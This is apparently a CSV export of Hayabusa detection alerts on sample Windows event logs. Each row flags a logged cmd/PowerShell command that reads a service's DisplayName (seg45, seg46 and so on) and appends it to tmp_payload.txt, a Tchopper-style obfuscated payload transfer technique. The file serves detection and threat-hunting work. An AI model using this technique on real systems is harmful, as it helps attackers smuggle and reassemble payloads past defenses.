2021-11-03 17:35:30.829 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg44"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcfc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xc6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:32.282 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg45"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x22c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xee8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:33.739 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg46"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb70 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:35.192 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:35.208 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg47"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:36.629 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xca4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:36.645 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg48"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x8f0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x29c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:38.069 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg49"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xaec | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:39.523 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg50"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe20 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xd84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:40.969 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg51"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x874 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xdd0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:42.411 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg52"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x7c0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x580 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:43.868 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg53"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x254 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:45.315 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa60 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:45.331 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg54"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xba4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa6c | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:46.783 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg55"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x2ac | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:48.220 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x964 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:48.236 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg56"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdd8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xfa4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:49.667 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg57"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xdcc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:51.102 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xce4 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:51.118 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg58"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xca0 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:52.551 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3cc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:52.566 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg59"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xb00 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa14 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:54.003 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg60"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xcb8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:55.437 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x748 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:55.453 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg61"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0x9c8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:56.883 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xafc | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:56.898 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg62"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xe80 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x3d8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:58.382 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg63"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xab8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xe44 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:35:59.833 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg64"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xc30 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0x994 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:01.284 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg65"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xac8 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xa54 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:02.737 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: powershell -command ""Get-Service ""seg66"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | PID: 0xa84 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
2021-11-03 17:36:04.183 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg67"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Path: C:\Windows\System32\cmd.exe | PID: 0xf90 | User: FS03$ | LID: 0x3e7",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1027-Obfuscated Files or Information/ID4688-Obfuscated payload transfer via service name - Tchopper.evtx
